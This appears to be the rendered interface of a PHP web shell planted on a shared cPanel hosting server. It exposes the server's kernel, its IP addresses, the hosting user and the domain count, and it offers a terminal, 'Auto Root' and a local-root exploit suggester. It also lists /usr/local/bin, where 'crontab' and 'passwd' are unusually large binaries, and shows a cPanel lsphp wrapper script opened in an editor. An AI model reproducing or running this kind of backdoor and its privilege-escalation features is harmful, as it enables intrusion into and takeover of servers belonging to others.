Linux srv.fwservers.com 4.18.0-477.21.1.el8_8.x86_64 #1 SMP Thu Aug 10 13:51:50 EDT 2023 x86_64
Apache
Server IP : 199.127.63.82 & Your IP : 216.73.217.89
Domains : 56 Domain
User : aconstruction
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
usr /
local /
bin /
Delete
Unzip
Name
Size
Permission
Date
Action
crontab
3.17
MB
-rwxr-xr-x
2026-08-18 11:03
ea-php72
5.55
MB
-rwxr-xr-x
2026-08-11 23:17
ea-php74
6.09
MB
-rwxr-xr-x
2026-08-11 23:27
ea-php80
7.62
MB
-rwxr-xr-x
2026-08-04 22:55
ea-php81
7.72
MB
-rwxr-xr-x
2026-08-04 22:52
ea-php82
7.78
MB
-rwxr-xr-x
2026-08-04 22:55
ea_convert_php_ini
39.85
KB
-rwxr-xr-x
2026-05-27 19:09
ea_current_to_profile
11.25
KB
-rwxr-xr-x
2026-05-27 19:09
ea_install_profile
7.1
KB
-rwxr-xr-x
2026-05-27 19:09
ea_sync_user_phpini_settings
6.73
KB
-rwxr-xr-x
2026-05-27 19:09
json_xs
6.85
KB
-r-xr-xr-x
2022-09-03 23:40
lsphp
937
B
-rwxr-xr-x
2026-05-18 16:37
mmdblookup
56.3
KB
-rwxr-xr-x
2023-05-30 01:09
npm
54
B
-rwxr-xr-x
2022-09-04 23:55
npx
2.77
KB
-rwxr-xr-x
2022-09-04 23:55
passwd
3.58
MB
-rwxr-xr-x
2026-08-18 11:03
pear
935
B
-rwxr-xr-x
2026-05-18 16:37
php
933
B
-rwxr-xr-x
2026-05-18 16:37
pm2
56
B
-rwxr-xr-x
2022-09-04 23:55
pm2-dev
59
B
-rwxr-xr-x
2022-09-04 23:55
pm2-docker
67
B
-rwxr-xr-x
2022-09-04 23:55
pm2-runtime
67
B
-rwxr-xr-x
2022-09-04 23:55
wp
181
B
-rwxr-xr-x
2025-06-24 13:29
wp-toolkit
167
B
-rwx------
2026-08-25 15:49
Save
Rename
#!/usr/local/cpanel/3rdparty/bin/perl # cpanel - php-lsapi Copyright 2018 cPanel, L.L.C. # All rights Reserved. # copyright@cpanel.net http://cpanel.net # This code is subject to the cPanel license. Unauthorized copying is prohibited package ea_php_cli::lsapi; BEGIN { delete @ENV{qw(PERL5LIB PERLLIB PERL5OPT PERL5DB PERL5SHELL PERL_DEBUG_MSTATS PERL_DESTRUCT_LEVEL)}; # Paranoid much? unshift @INC, '/var/cpanel/ea4'; # avoid slow use lib } use strict; use warnings; use ea_php_cli (); my $bin = "lsphp"; run(@ARGV) unless caller(); sub run { return ea_php_cli::run( $bin, @_ ); # faster than unshift @_, "php-cgi"; goto &ea_php_cli::run; ? } 1;